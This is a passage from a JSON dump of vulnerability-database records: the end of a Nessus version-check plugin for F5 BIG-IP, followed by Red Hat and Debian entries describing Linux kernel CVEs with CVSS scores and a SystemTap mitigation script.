or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL15699\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.1.0-10.2.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.0.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.1.0-11.6.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# PSM\nvmatrix[\"PSM\"] = 
make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.1.0-11.4.1\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.1.0-11.3.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.1.0-11.3.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.0.0\",\"10.0.0-10.2.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_note(port:0, extra:bigip_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhatcve": [{"lastseen": "2021-09-02T22:53:23", "description": "A missing authorization check in the fscrypt_process_policy function in fs/crypto/policy.c in the ext4 and f2fs filesystem encryption support in the Linux kernel allows a user to assign an encryption policy to a directory owned by a different user, potentially creating a denial of service.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-04-06T13:47:55", "type": "redhatcve", "title": "CVE-2016-10318", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10318"], "modified": "2020-04-08T18:59:56", "id": "RH:CVE-2016-10318", "href": "https://access.redhat.com/security/cve/cve-2016-10318", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-09-02T22:53:56", "description": "The vfe31_proc_general function in drivers/media/video/msm/vfe/msm_vfe31.c in the MSM-VFE31 driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not validate a certain id value, which allows attackers to gain privileges or cause a denial of service (memory corruption) via an application that makes a crafted ioctl call.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-05T05:13:33", "type": "redhatcve", "title": "CVE-2014-9410", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9410"], "modified": "2021-03-18T17:20:21", "id": "RH:CVE-2014-9410", "href": "https://access.redhat.com/security/cve/cve-2014-9410", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T11:11:38", "description": "The Linux kernel, before version 4.14.3, is vulnerable to a denial of service in drivers/md/dm.c:dm_get_from_kobject() which can be caused by local users leveraging a race condition with __dm_destroy() during creation and removal of DM devices. Only privileged local users (with CAP_SYS_ADMIN capability) can directly perform the ioctl operations for dm device creation and removal and this would typically be outside the direct control of the unprivileged attacker.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-08T04:58:16", "type": "redhatcve", "title": "CVE-2017-18203", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": "2022-07-07T09:25:24", "id": "RH:CVE-2017-18203", "href": 
"https://access.redhat.com/security/cve/cve-2017-18203", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-08T05:22:06", "description": "A vulnerability was found in the Key Management subcomponent of the Linux kernel, where trying to issue a KEYCTL_READ on a negative key would lead to a NULL pointer dereference. A local attacker could use this flaw to crash the kernel.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-14T19:02:39", "type": "redhatcve", "title": "CVE-2017-12192", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12192"], "modified": "2022-06-08T03:34:16", "id": "RH:CVE-2017-12192", "href": "https://access.redhat.com/security/cve/cve-2017-12192", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-07-07T11:11:22", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function.\n#### Mitigation\n\nAttached to this bugzilla is a systemtap script that will prevent 
opening (and therefore reading) the /proc/<process>/timers file which is used to leak information. \n\n\nThe SystemTap script is relatively small and efficient, broken into 3 distinct sections as follows: \n\n\n\\-------- \n\n\nprobe kernel.function(\"proc_timers_open@fs/proc/base.c\").return { \n // this is -EACCES \n$return = -13; \n message = sprintf(\"CVE-2017-18344 mitigation denied access to %s to %s(%d)\", file_name , execname(), pid()); \n // print a warning message at KERN_INFO debug level \n printk(6, message); \n} \n\n\nprobe begin { \n printk(6, \"Mitigation for CVE-2017-18344 loaded.\\n\"); \n} \n\n\nprobe end { \n printk(6, \"Mitigation for CVE-2017-18344 unloaded.\\n\"); \n} \n\n\n\\--------- \n\n\nFirst, the script places a probe at the return of the kernel function \u201cproc_timers_open\u201d when called. This changes the return value to EACCES, which is returned to userspace and prevents the file from being opened. When an attempt is made to open the /proc/<pid>/timers file, a message will be logged to the kernel log subsystem showing the process and pid of the application attempting to access the timers file. \n\n\nThis file is not in widespread use at this time, although some applications may read from it to debug or understand their own timers that are set. This mitigation will not be useful in this context. \n\n\nFinally, the \u201cprobe begin\u201d and \u201cprobe end\u201d code blocks tell systemtap to add the supplied text to the kernel log buffer via the printk function. This creates an audit trail by registering in the system logs exactly when the mitigation is loaded and unloaded. The script needs guru mode (-g parameter) to compile. \n\n\nThis will need to be loaded at each boot to remain effective. Red Hat Product security recommends updating to a patched kernel when it is available. \n\n\nRed Hat always seeks to provide both mitigations to disable attacks as well as the actual patches to treat the flaw. 
To learn more about SystemTap, and how it can be used in your management of your Red Hat systems, please refer to Using SystemTap[1] or one of our videos about it within our Customer Portal[2]. \n\n\n1 - <https://access.redhat.com/articles/17839> \n2 - <https://access.redhat.com/search/#/?q=systemtap> \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-08-01T17:49:05", "type": "redhatcve", "title": "CVE-2017-18344", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2022-07-07T09:27:31", "id": "RH:CVE-2017-18344", "href": "https://access.redhat.com/security/cve/cve-2017-18344", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2023-05-31T14:36:03", "description": "A missing authorization check in the fscrypt_process_policy function in fs/crypto/policy.c in the ext4 and f2fs filesystem encryption support in the Linux kernel before 4.7.4 allows a user to assign an encryption policy to a directory owned by a different user, potentially creating a denial of service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", 
"confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-04T16:59:00", "type": "debiancve", "title": "CVE-2016-10318", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10318"], "modified": "2017-04-04T16:59:00", "id": "DEBIANCVE:CVE-2016-10318", "href": "https://security-tracker.debian.org/tracker/CVE-2016-10318", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-01T14:38:47", "description": "The regulator_ena_gpio_free function in drivers/regulator/core.c in the Linux kernel before 3.19 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted application.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-02T21:59:00", "type": "debiancve", "title": "CVE-2014-9940", "bulletinFamily": "info", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9940"], "modified": "2017-05-02T21:59:00", "id": "DEBIANCVE:CVE-2014-9940", "href": "https://security-tracker.debian.org/tracker/CVE-2014-9940", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T06:10:38", "description": "Out-of-bounds memory read in the x509_decode_time function in x509_cert_parser.c in Linux kernels 4.3-rc1 and after.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-09-25T21:29:00", "type": "debiancve", "title": "CVE-2015-5327", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5327"], "modified": "2017-09-25T21:29:00", "id": "DEBIANCVE:CVE-2015-5327", "href": 
"https://security-tracker.debian.org/tracker/CVE-2015-5327", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-05-31T14:36:03", "description": "Use-after-free vulnerability in mm/percpu.c in the Linux kernel through 4.6 allows local users to cause a denial of service (BUG) or possibly have unspecified other impact via crafted use of the mmap and bpf system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-23T10:59:00", "type": "debiancve", "title": "CVE-2016-4794", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4794"], "modified": "2016-05-23T10:59:00", "id": "DEBIANCVE:CVE-2016-4794", "href": "https://security-tracker.debian.org/tracker/CVE-2016-4794", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:38:47", "description": "The batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in the B.A.T.M.A.N. 
implementation in the Linux kernel through 3.18.1 uses an incorrect length field during a calculation of an amount of memory, which allows remote attackers to cause a denial of service (mesh-node system crash) via fragmented packets.", "cvss3": {}, "published": "2015-01-02T21:59:00", "type": "debiancve", "title": "CVE-2014-9428", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9428"], "modified": "2015-01-02T21:59:00", "id": "DEBIANCVE:CVE-2014-9428", "href": "https://security-tracker.debian.org/tracker/CVE-2014-9428", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-01T14:38:47", "description": "The paravirt_ops_setup function in arch/x86/kernel/kvm.c in the Linux kernel through 3.18 uses an improper paravirt_enabled setting for KVM guest kernels, which makes it easier for guest OS users to bypass the ASLR protection mechanism via a crafted application that reads a 16-bit value.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2014-12-12T18:59:00", "type": "debiancve", "title": "CVE-2014-8134", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, 
"obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2014-12-12T18:59:00", "id": "DEBIANCVE:CVE-2014-8134", "href": "https://security-tracker.debian.org/tracker/CVE-2014-8134", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-31T18:11:38", "description": "The dm_get_from_kobject function in drivers/md/dm.c in the Linux kernel before 4.14.3 allows local users to cause a denial of service (BUG) by leveraging a race condition with __dm_destroy during creation and removal of DM devices.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-02-27T20:29:00", "type": "debiancve", "title": "CVE-2017-18203", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": 
"2018-02-27T20:29:00", "id": "DEBIANCVE:CVE-2017-18203", "href": "https://security-tracker.debian.org/tracker/CVE-2017-18203", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-31T14:36:03", "description": "The keyctl_read_key function in security/keys/keyctl.c in the Key Management subcomponent in the Linux kernel before 4.13.5 does not properly consider that a key may be possessed but negatively instantiated, which allows local users to cause a denial of service (OOPS and system crash) via a crafted KEYCTL_READ operation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-12T00:29:00", "type": "debiancve", "title": "CVE-2017-12192", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12192"], "modified": "2017-10-12T00:29:00", "id": "DEBIANCVE:CVE-2017-12192", "href": "https://security-tracker.debian.org/tracker/CVE-2017-12192", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-31T18:11:38", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the 
sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-07-26T19:29:00", "type": "debiancve", "title": "CVE-2017-18344", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2018-07-26T19:29:00", "id": "DEBIANCVE:CVE-2017-18344", "href": "https://security-tracker.debian.org/tracker/CVE-2017-18344", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-01T06:10:38", "description": "The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 do not properly consider yielding a processor, which allows remote attackers to cause a denial of service (system hang) via incorrect checksums within a UDP packet flood.", "cvss3": {}, "published": "2015-08-31T10:59:00", "type": "debiancve", "title": "CVE-2015-5364", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2015-08-31T10:59:00", "id": "DEBIANCVE:CVE-2015-5364", "href": "https://security-tracker.debian.org/tracker/CVE-2015-5364", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-31T14:36:03", "description": "Race condition in arch/x86/mm/tlb.c in the Linux kernel before 4.4.1 allows local users to gain privileges by triggering access to a paging structure by a different CPU.", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-27T17:59:00", "type": "debiancve", "title": "CVE-2016-2069", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 